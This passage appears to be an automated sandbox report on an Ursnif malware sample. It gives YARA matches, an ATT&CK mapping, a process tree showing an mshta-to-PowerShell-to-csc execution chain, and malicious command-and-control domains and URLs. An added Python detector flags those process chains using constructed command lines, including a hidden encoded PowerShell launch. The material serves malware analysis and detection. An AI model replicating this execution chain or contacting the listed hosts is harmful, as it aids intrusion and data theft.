            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (5 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 cpuid
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F13A79 HeapFree,GetSystemTimeAsFileTime,HeapFree,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F14638 GetVersion,lstrcat,lstrcat,lstrcat,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00F1A303 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match, file source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match, file source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: the same 28 memory-dump matches (type: MEMORY) and the same four process memory spaces (loaddll32.exe PID: 6360, regsvr32.exe PID: 6388, rundll32.exe PID: 6400, rundll32.exe PID: 6424; type: MEMORYSTR) as listed under "Stealing of Sensitive Information" above; the report repeats that list verbatim under this heading.

            Mitre Att&ck Matrix

The matrix is listed here per tactic column. A number in parentheses is the report's own per-technique counter, kept as printed; techniques without a number are matrix template entries that were not observed.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Privilege Escalation: DLL Side-Loading (1); Process Injection (511); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron
Defense Evasion: Obfuscated Files or Information (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (511); Regsvr32 (1); Rundll32 (1); Indicator Removal from Tools; Masquerading; Invalid Code Signature; Right-to-Left Override
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (1); System Information Discovery (25); Query Registry (1); Security Software Discovery (1); Virtualization/Sandbox Evasion (21); Process Discovery (2); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media
Collection: Archive Collected Data (1); Email Collection (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium
Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop

            Behavior Graph

Behavior Graph ID: 539457 | Sample: 6.png | Start date: 14/12/2021 | Architecture: WINDOWS | Score: 100
Signatures attached to the sample node: Found malware configuration; Yara detected Ursnif; Machine Learning detection for sample; 5 other signatures

Process tree recovered from the graph (numbers in brackets are the graph's own node ids; network, signature and dropped-file annotations are listed under the process they were attached to):

6.png (start)
  loaddll32.exe [9]
    DNS/IP: windows.update3.com; berukoneru.website; 2 other IPs or domains
    Signatures: Writes to foreign memory regions; Writes or reads registry keys via WMI; Writes registry values via WMI
    cmd.exe [19]
      rundll32.exe [38]
        DNS/IP: 3.12.124.139:443 (source ports 49775, 49778; AMAZON-02, US, United States); windows.update3.com; 2 other IPs or domains
        Signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Writes registry values via WMI
        control.exe [59]
          rundll32.exe [69]
    regsvr32.exe [21]
      DNS/IP: berukoneru.website 79.110.52.144:443 (source ports 49795, 49796; V4ESCROW-AS, RO, Romania); windows.update3.com; prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com 18.219.227.107:443 (source ports 49772, 49773; AMAZON-02, US, United States)
      Signatures: Writes to foreign memory regions; Writes or reads registry keys via WMI; Writes registry values via WMI
      control.exe [42]
    rundll32.exe [25]
      DNS/IP: windows.update3.com
      Signatures: System process connects to network (likely due to code injection or exploit)
      control.exe [44]
    BackgroundTransferHost.exe [27]
  mshta.exe [13]
    powershell.exe [29]
      Dropped: C:\Users\user\AppData\...\nigogz4l.cmdline (UTF-8)
      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Creates a thread in another existing process (thread injection)
      csc.exe [46]
        Dropped: C:\Users\user\AppData\Local\...\nigogz4l.dll (PE32)
        cvtres.exe [61]
      2 other processes [53]
        Dropped: C:\Users\user\AppData\Local\...\dtnsoflb.dll (PE32)
  mshta.exe [15]
    powershell.exe [32]
      csc.exe [49]
        Dropped: C:\Users\user\AppData\Local\...\nlbomp32.dll (PE32)
        cvtres.exe [63]
      conhost.exe [51]
  2 other processes [17]
    powershell.exe [34]
      2 other processes [55]
        Dropped: C:\Users\user\AppData\Local\...\uu5u2nmv.dll (PE32)
        cvtres.exe [65]
    powershell.exe [36]
      2 other processes [57]
        Dropped: C:\Users\user\AppData\Local\...\wklr4juq.dll (PE32)
        cvtres.exe [67]
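The parent/child relationships in the graph are what a SOC turns into process-tree detections: mshta.exe spawning powershell.exe, powershell.exe driving csc.exe to compile a source file out of the user's AppData folder, and rundll32.exe/regsvr32.exe relaying through control.exe. The following Python is an added example and not part of the Joe Sandbox report: it builds a tree from constructed Sysmon Event ID 1 style records (PIDs, paths and command lines are invented here, modelled on the graph) and flags those three chains. The folder list and the process-name sets are assumptions of this example.

```python
import ntpath

# Constructed Sysmon Event ID 1 style records modelled on the report's behavior
# graph. PIDs, file names and command lines are invented for this example.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Users\user\AppData\Local\Temp\stage.hta"},
    {"pid": 110, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -e <long encoded argument>"},
    {"pid": 120, "ppid": 110, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmd": r'csc.exe /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline"'},
    {"pid": 130, "ppid": 120, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe",
     "cmd": "cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"},
    {"pid": 200, "ppid": 1, "image": r"C:\Windows\System32\loaddll32.exe",
     "cmd": r"loaddll32.exe C:\Users\user\Desktop\6.dll"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1'},
    {"pid": 220, "ppid": 210, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmd": r'rundll32.exe "C:\Users\user\Desktop\6.dll",#1'},
    {"pid": 230, "ppid": 220, "image": r"C:\Windows\SysWOW64\control.exe", "cmd": "control.exe"},
    {"pid": 240, "ppid": 230, "image": r"C:\Windows\SysWOW64\rundll32.exe", "cmd": "rundll32.exe"},
    # Benign control: a developer build compiling from a source checkout.
    {"pid": 300, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 310, "ppid": 300,
     "image": r"C:\Program Files\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe",
     "cmd": "MSBuild.exe app.csproj"},
    {"pid": 320, "ppid": 310, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "cmd": r'csc.exe /noconfig @"C:\src\app\obj\Debug\app.cmdline"'},
]

# Assumed name sets and folders for this example.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
LOADERS = {"rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\users\public", r"\programdata")


def image_name(event):
    """Lower-cased file name of the process image (ntpath handles backslashes on any OS)."""
    return ntpath.basename(event["image"]).lower()


def build_index(events):
    """Map pid -> event so parents can be looked up; the root ppid (1) is not an event."""
    return {e["pid"]: e for e in events}


def ancestry(by_pid, pid):
    """Yield the ancestors of pid, nearest first, stopping at the first unknown pid."""
    while pid in by_pid:
        event = by_pid[pid]
        yield event
        pid = event["ppid"]


def detect(events):
    """Return (rule, parent_pid, child_pid) tuples for the three chains in the graph."""
    by_pid = build_index(events)
    findings = []
    for event in events:
        name = image_name(event)
        parent = by_pid.get(event["ppid"])
        parent_name = image_name(parent) if parent else ""
        # Rule 1: script host spawning a shell (the report's "MSHTA Spawning Windows Shell" hit).
        if parent_name in SCRIPT_HOSTS and name in SHELLS:
            findings.append(("script_host_spawns_shell", parent["pid"], event["pid"]))
        # Rule 2: csc.exe compiling from a user-writable folder with a shell somewhere above it
        # (the report's "Suspicious Csc.exe Source File Folder" hit). A build tool compiling
        # from a source checkout does not match.
        if name == "csc.exe" and any(p in event["cmd"].lower() for p in USER_WRITABLE):
            if any(image_name(a) in SHELLS for a in ancestry(by_pid, event["ppid"])):
                findings.append(("csc_from_user_writable_dir", event["ppid"], event["pid"]))
        # Rule 3: rundll32/regsvr32 spawning control.exe, seen three times in the graph.
        if name == "control.exe" and parent_name in LOADERS:
            findings.append(("loader_spawns_control_exe", parent["pid"], event["pid"]))
    return findings


if __name__ == "__main__":
    for rule, ppid, pid in detect(EVENTS):
        print(f"{rule}: parent pid {ppid} -> child pid {pid}")
```

With real telemetry, feed the same dictionaries from Sysmon's ProcessId, ParentProcessId, Image and CommandLine fields; the rules only need those four.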


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

Source | Detection | Scanner | Label
6.dll | 100% | Joe Sandbox ML |

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

Source | Detection | Scanner | Label
4.2.rundll32.exe.f10000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

            Domains

Source | Detection | Scanner | Label
windows.update3.com | 0% | Virustotal |

            URLs

Source | Detection | Scanner | Label
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://berukoneru.website/tyi | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
https://windows.update3.com/ | 0% | Avira URL Cloud | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ | 0% | Avira URL Cloud | safe
https://assets.onestore.ms/cdnfiles/onestorerolling-1605-16000/shell/common/respond-proxy.html | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta | 0% | Avira URL Cloud | safe
https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT | 0% | Avira URL Cloud | safe
https://berukoneru.website/ | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
https://berukoneru.website/O | 0% | Avira URL Cloud | safe
https://berukoneru.website/BS | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta | 0% | Avira URL Cloud | safe
https://berukoneru.website/j | 0% | Avira URL Cloud | safe
https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6 | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta | 0% | Avira URL Cloud | safe
https://nodejs.org0 | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta | 0% | Avira URL Cloud | safe
https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65 | 0% | Avira URL Cloud | safe
https://berukoneru.website/jP | 0% | Avira URL Cloud | safe
https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta | 0% | Avira URL Cloud | safe
https://berukoneru.website/LAp | 0% | Avira URL Cloud | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 18.219.227.107 | true | false | | high
berukoneru.website | 79.110.52.144 | true | true | | unknown
windows.update3.com | unknown | unknown | true | | unknown

                Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
https://berukoneru.website/tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta | true | Avira URL Cloud: safe | unknown
